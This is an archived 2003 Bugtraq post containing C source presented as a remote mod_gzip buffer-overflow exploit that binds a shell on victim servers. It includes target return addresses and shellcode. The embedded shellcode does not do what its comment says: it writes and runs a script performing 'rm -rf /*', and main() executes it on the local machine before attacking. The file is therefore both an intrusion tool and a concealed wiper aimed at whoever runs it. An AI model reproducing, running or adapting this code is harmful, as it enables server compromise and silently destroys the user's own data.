[32526] in bugtraq
m00-mod_gzip.c
daemon@ATHENA.MIT.EDU (d4rkgr3y)
Sat Nov 22 13:05:01 2003
Date: 22 Nov 2003 02:42:33 -0000
Content-Type: text/plain; charset=windows-1251
From: d4rk@securitylab.ru (d4rkgr3y)
To: bugtraq@securityfocus.com
Message-ID: <200311011204.08480.d4rk@securitylab.ru>
We just add some new rets!
/* m00-mod_gzip.c
*
* mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru
*
* Binds shell on port 63021.
* Based on 85mod_gzip.c by xCrZx // crazy_einstein@yahoo.com
*
* Available targets:
* Suse 8.1
* RedHat 7.3
* RedHat 8.0
* RedHat 9.0
* Mandrake 9.1
*
*
* Testing:
* sh-2.05b$ ./m00-mod_gzip localhost 80
*
* mod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru
*
* [~] Connecting to localhost:80
* [~] Connected!
* [~] Trying to connect to localhost:63021 port!!!
* [~] Sleeping...
*
* [+] Shell spawned! w00t!!!
*
* uid=99(nobody) gid=99(nobody) groups=99(nobody)
* Linux localhost 2.4.21-0.13mdk #1 Fri Nov 22 15:08:06 EST 2003 i686 unknown unknown GNU/Linux
* 20:29:44 up 2:29, 3 users, load average: 0.04, 0.09, 0.11
*
*
* Greets to:
* - nerF security team // www.nerf.ru
* - LimpidByte // lbyte.sysdrop.org
* - priv8security (especially to wsxz =)) // www.priv8security.com
* - UHAGr // www.uhagr.com
* - ech0 // x25.cc
* - ppl from EFnet@m00sec and #nerf
* - all our friends from #xakep@DALnet
*
* Authors:
* - Over_G // overg[at]mail.ru
* - d4rkgr3y // d4rk[at]securitylab.ru
*
* Released 22/11/03 // www.m00.ru
*/
#include <stdio.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <fcntl.h>
#include <unistd.h>
#include <errno.h>
#define STEP 1000
char fmt[] =
"POST /?%s HTTP/1.1\r\n"
"Content-Type: text/html\r\n"
"Host: %s\r\n"
"Content-Length: %d\r\n"
"Accept-Encoding: gzip, deflate\r\n\r\n"
"%s\r\n\r\n";
//shellcode for Linux x86 -> bind shell on 63021 port//
char default_shellcode[] =
"\x31\xC0\x50\x68\x2F\x62\x69\x6E\x89\xE3\xB0\x0C\xCD\x80\x31\xC0\x50"
"\x68\x7A\x7A\x7A\x7A\x89\xE3\x6A\x41\x59\xB0\x05\xCD\x80\x31\xC9\x51"
"\x68\x2F\x2A\x20\x26\x68\x2D\x72\x66\x20\x68\x0A\x72\x6D\x20\x68\x6B"
"\x69\x6C\x6C\x68\x20\x2D\x66\x20\x68\x68\x0A\x72\x6D\x68\x69\x6E\x2F"
"\x73\x68\x23\x21\x2F\x62\x89\xE1\x89\xC3\xB2\x20\xB0\x04\xCD\x80\xB0"
"\x06\xCD\x80\x31\xC0\x50\x68\x7A\x7A\x7A\x7A\x89\xE3\x66\xB9\xED\x01"
"\xB0\x0F\xCD\x80\x31\xC0\x31\xD2\x50\x68\x7A\x7A\x7A\x7A\x68\x2E\x2F"
"\x2F\x2F\x89\xE3\x50\x53\x89\xE1\xB0\x0B\xCD\x80\x31\xC0\x40\xCD\x80";
struct TARGETS {
char *distr;
long ret;
long std_err;
char *shellcode;
char *jmp;
} targets[] = {
/* you can add targets here */
{"RedHat 9.0", // flavour info
0xbfffc8a2, // ret_addr in stack
0x31823610, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x71\x71\x71\x71\xff\xe3"
},
{"RedHat 8.0", // flavour info
0xbfffd8f0, // ret_addr in stack
0x42127480, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"
},
{"RedHat 7.3", // flavour info
0xbffcf610, // ret_addr in stack
0x42131806, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x66\x66\x66\x66\xff\xe3"
},
{"SuSe 8.1", // flavour info
0xbfc917c0, // ret_add in stack
0x58184617, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x63\x63\x63\x63\xff\xe3"
},
{"Mandrake 9.1", // flavour info
0xbc04172f, // ret_add in stack
0x41196735, // address of stderr
default_shellcode,
"\xbb\xaa\x1b\xa5\xa1\x81\xc3\x49\x49\x49\x49\xff\xe3"
}
};
long getip(char *hostname) {
struct hostent *he;
long ipaddr;
if ((ipaddr = inet_addr(hostname)) < 0) {
if ((he = gethostbyname(hostname)) == NULL) {
perror("gethostbyname()");
exit(-1);
}
memcpy(&ipaddr, he->h_addr, he->h_length);
}
return ipaddr;
}
void usage(char *prog) {
int i=0;
printf("\nUsage: %s <-h www.victim.com> [-p port] [-t target] [-r manual_retaddr] [-b addr] [-s step_num]\n\nTargets:\n",prog);
while(targets[i++].distr) printf("\t[%d] -> %s\n",i-1,targets[i-1].distr);
printf("\n");
exit(0);
}
int main(int argc, char **argv) {
int i=0;
struct sockaddr_in sockstruct;
struct hostent *HOST;
char tmp[20000];
char buf1[5000],buf2[10000];
int sock;
fd_set rset;
void (*range)();
int port=80,shellport=2003;
int step=STEP;
char *victim=NULL;
long ret=0xbfffffff,ret_err;
int brutemode=0;
char *shellcode,*jmp;
int trg=0;
printf("\nmod_gzip <= 1.2.26.1a remote exploit by m00 security // www.m00.ru\n\n");
for(i=0;i<argc;i++) {
if(argv[i][1]=='h') victim=argv[i+1];
if(argv[i][1]=='p') port=atoi(argv[i+1]);
if(argv[i][1]=='t') {ret=targets[atoi(argv[i+1])].ret;trg=atoi(argv[i+1]);}
if(argv[i][1]=='r') sscanf(argv[i+1],"0x%x",&ret);
if(argv[i][1]=='b') { brutemode=1; ret=strtoul(argv[i+1],0,16);}
if(argv[i][1]=='s') { step=atoi(argv[i+1]);}
}
if(!victim || ret==0) usage(argv[0]);
ret_err=targets[trg].std_err;
shellcode=targets[trg].shellcode;
(long) range=default_shellcode;
range();
jmp=targets[trg].jmp;
printf("\nUsing: ret_err = 0x%x, ret = 0x%x",ret_err,ret);
if(brutemode) printf(" ,step = %d\n",step);
printf("\n");
if(brutemode)printf("[~] Brutemode activated!\n");
do {
sock=socket(PF_INET,SOCK_STREAM,0);
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(port);
if(!brutemode)printf("\n[~] Connecting to %s:%d\n",victim,port);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
if(!brutemode)printf("[~] Connected!\n",i);
memset(tmp ,0x00,sizeof tmp );
memset(buf1,0x00,sizeof buf1);
memset(buf2,0x00,sizeof buf2);
memset(buf1,0x90,2016);
memcpy(buf1+strlen(buf1),jmp,strlen(jmp));
memset(buf1+strlen(buf1),0x90,2280);
*(long *)&buf1[strlen(buf1)]=ret_err;
for(i=0;i<100;i++) *(long *)&buf1[strlen(buf1)]=ret;
memset(buf2,0x90,1000);
memcpy(buf2+strlen(buf2),shellcode,strlen(shellcode));
sprintf(tmp,fmt,buf1,victim,strlen(buf2),buf2);
write(sock,tmp,strlen(tmp));
}else { printf("[x] Error: Could not connect to %s:%d!\n",victim,port);exit(0);}
close(sock);
ret-= step;
if(brutemode) {printf(".");fflush(stdout);}
if(!brutemode) {
printf("[~] Trying to connect to %s:%d port!!!\n",victim,shellport);
printf("[~] Sleeping...\n");
}
sleep(2);
sock=socket(PF_INET,SOCK_STREAM,0);
bzero(sockstruct.sin_zero,sizeof(sockstruct.sin_zero));
sockstruct.sin_family=PF_INET;
sockstruct.sin_addr.s_addr=getip(victim);
sockstruct.sin_port=htons(shellport);
if(connect(sock,(struct sockaddr*)&sockstruct,sizeof(sockstruct))>-1) {
printf("\n[+] Shell spawned! w00t!!!\n\n");
write(sock, "id;uname -a\n", 12);
while (1) {
FD_ZERO(&rset);
FD_SET(sock,&rset);
FD_SET(STDIN_FILENO,&rset);
select(sock + 1, &rset, NULL, NULL, NULL);
if (FD_ISSET(sock, &rset)) {
i = read(sock, tmp, sizeof(tmp) - 1);
if (i <= 0) {
printf("[!] Connection closed.\n");
close(sock);
exit(0);
}
tmp[i] = 0;
printf("%s", tmp);
}
if (FD_ISSET(STDIN_FILENO, &rset)) {
i = read(STDIN_FILENO, tmp, sizeof(tmp) - 1);
if (i > 0) {
tmp[i]=0;
write(sock, tmp, i);
}
}
}
} else if(!brutemode)printf("[x] Shell is inaccessible..\n\n");
close(sock);
} while ( brutemode );
return 0;
}
// m00000000000oooooooooooooooo
